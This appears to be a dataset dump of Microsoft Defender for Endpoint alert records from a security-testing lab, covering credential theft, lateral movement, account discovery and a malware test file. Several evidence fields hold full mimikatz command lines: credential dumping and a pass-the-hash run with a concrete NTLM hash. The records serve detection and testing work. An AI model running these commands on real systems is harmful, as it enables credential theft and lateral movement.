alertId
stringclasses
278 values
providerAlertId
stringclasses
278 values
incidentId
int64
486
989
serviceSource
stringclasses
2 values
creationTime
stringdate
2022-09-30 05:04:51
2023-01-24 06:03:50
lastUpdatedTime
stringdate
2022-11-12 01:35:42
2023-01-24 06:05:47
resolvedTime
stringclasses
23 values
firstActivity
stringdate
2022-09-07 09:25:00
2023-01-24 05:31:07
lastActivity
stringdate
2022-09-30 05:00:00
2023-01-24 05:43:53
title
stringclasses
62 values
description
stringclasses
51 values
category
stringclasses
12 values
status
stringclasses
2 values
severity
stringclasses
4 values
investigationId
int64
20
64
investigationState
stringclasses
9 values
classification
stringclasses
1 value
determination
stringclasses
1 value
detectionSource
stringclasses
7 values
detectorId
stringclasses
48 values
assignedTo
stringclasses
3 values
actorName
stringclasses
1 value
threatFamilyName
stringclasses
6 values
mitreTechniques
listlengths
0
8
devices
listlengths
1
6
entities
listlengths
0
49
entityType
stringclasses
2 values
evidenceCreationTime
stringclasses
469 values
verdict
stringclasses
5 values
remediationStatus
stringclasses
2 values
accountName
stringclasses
30 values
domainName
stringclasses
17 values
userSid
stringclasses
22 values
aadUserId
stringclasses
8 values
userPrincipalName
stringclasses
14 values
sha1
stringclasses
28 values
sha256
stringclasses
27 values
fileName
stringclasses
21 values
filePath
stringclasses
13 values
processId
int64
0
20.7k
processCommandLine
stringclasses
67 values
processCreationTime
stringclasses
133 values
parentProcessId
int64
0
14.6k
parentProcessCreationTime
stringclasses
63 values
parentProcessFileName
stringclasses
14 values
parentProcessFilePath
stringclasses
11 values
detectionStatus
stringclasses
1 value
deviceId
stringclasses
9 values
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:50:47.8466667Z
Suspicious
None
admin
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515968048904_2062696340
7699ae3b-e99f-48d4-aeba-77f1eb5fa9de
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:56.8049323Z
2022-11-12T01:35:42.87Z
2022-11-11T08:28:42.4277612Z
2022-11-11T08:17:36.7892749Z
2022-11-11T08:17:58.1670825Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
40
Benign
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.", "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043450334537467_583987947
5febff40-5240-4a2e-a234-44e3e7c99201
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:33.4537677Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:26.1815261Z
2022-11-18T05:13:20.6682782Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:33.5Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.5Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.5Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b8c0e6116af2318bac405b294f4ec4dd0689acfe", "sha256": "b2d761caea2505311e7e239a4988be8decbf842ff3c27a1ffeebd45774951df6", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:33.5Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-18T05:09:25.8967859Z", "processId": 10600, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:14:28.54Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "a67c6e98bb5d2b713d59af9f2222939d621218db", "sha256": "b31a963c0b0834d88c45096fa467f6c75ea8577413e9c511d4139105989c0f53", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.54Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-18T05:13:19.6189613Z", "processId": 10176, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:20:01.6733333Z
Suspicious
Active
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
2,596
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-09-30T06:11:52.7127433Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:26.1266667Z
Suspicious
None
jeff
lab.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001152308827480_-286400086
636277db-9b37-411e-b2de-ba2a60f61c07
486
MicrosoftDefenderForEndpoint
2022-09-30T06:13:50.8827674Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:08.3651044Z
2022-09-30T06:13:08.3651044Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:13:50.9266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638065313887400647_-445185874
0e865fec-7f5d-4cfb-aab4-a2d15412095f
794
MicrosoftDefenderForEndpoint
2022-12-13T12:29:48.7400829Z
2022-12-13T12:35:25.2966667Z
null
2022-12-13T12:18:08.9271426Z
2022-12-13T12:18:08.9271426Z
'Donoff' malware was prevented
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
New
Informational
58
PendingApproval
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
null
null
Donoff
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-12-13T12:00:53.459Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "50ffd07170283e077006618b8afafeaecc185857", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Medium", "tags": [], "version": "21H1", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "50ffd07170283e077006618b8afafeaecc185857", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-13T12:29:48.7766667Z", "fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm", "filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Prevented", "remediationStatusDetails": "Entity was pre-remediated by Windows Defender", "sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1", "sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043434790542507_650999825
800cbead-8eca-48b2-9281-1140eb27aeca
741
MicrosoftDefenderForEndpoint
2022-11-18T04:44:39.0542693Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T04:37:10.8013687Z
2022-11-18T04:48:53.2431943Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "tmtower-book", "firstSeen": "2022-10-10T06:18:04.255Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Takeshi", "domainName": "TMTOWER-BOOK" } ], "mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "onboardingStatus": "Onboarded", "osBuild": 22621, "osPlatform": "Windows11", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "22H2", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": null, "deviceId": null, "domainName": "TMTOWER-BOOK", "entityType": "User", "evidenceCreationTime": "2022-11-18T04:44:39.08Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:39.08Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-18T04:38:44.7323003Z", "processId": 17344, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "76866dde54ee3fa5bc8efefb9d44e6bf859973aa", "sha256": "afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:39.08Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:09.1457881Z", "parentProcessFileName": "Code.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume3\\Users\\Takeshi\\AppData\\Local\\Programs\\Microsoft VS Code", "parentProcessId": 12136, "processCommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Import-Module 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules\\PowerShellEditorServices\\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules' -EnableConsoleRepl -StartupBanner \\\"PowerShell Extension v2022.8.5\nCopyright (c) Microsoft Corporation.\n\nhttps://aka.ms/vscode-powershell\nType 'help' to get help.\n\\\" -LogLevel 'Normal' -LogPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\logs\\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\\EditorServices.log' -SessionDetailsPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\sessions\\PSES-VSCode-11004-905307.json' -FeatureFlags @() \"", "processCreationTime": "2022-11-14T04:36:16.5242809Z", "processId": 14616, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "9678ea8069d9812cda2a41c9d3dc32d5c4555b7b", "sha256": "529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:44:44.5766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-18T04:38:47.8268858Z", "processId": 8244, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "76866dde54ee3fa5bc8efefb9d44e6bf859973aa", "sha256": "afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:49:27.5566667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-18T04:48:32.6749282Z", "processId": 19196, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "76866dde54ee3fa5bc8efefb9d44e6bf859973aa", "sha256": "afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": "Detected", "deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "domainName": "TMTOWER-BOOK", "entityType": "Process", "evidenceCreationTime": "2022-11-18T04:49:27.71Z", "fileName": "net.exe", "filePath": "C:\\WINDOWS\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 14616, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-18T04:48:29.6840798Z", "processId": 5916, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "76866dde54ee3fa5bc8efefb9d44e6bf859973aa", "sha256": "afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:20:15.65Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
816
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
2022-11-11T08:17:06.6760783Z
4,704
2022-11-11T08:16:44.2952776Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:56.86Z
Benign
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
268
PSEXESVC.exe
2022-11-11T08:17:57.8297749Z
680
2022-11-10T17:17:06.0160973Z
services.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T15:04:40.1533333Z
Malicious
None
msftadmin
null
S-1-12-1-2269820315-1261997569-3294602117-2733835123
874ab59b-8e01-4b38-85a3-5fc47303f3a2
msftadmin@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:45.93Z
Suspicious
None
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
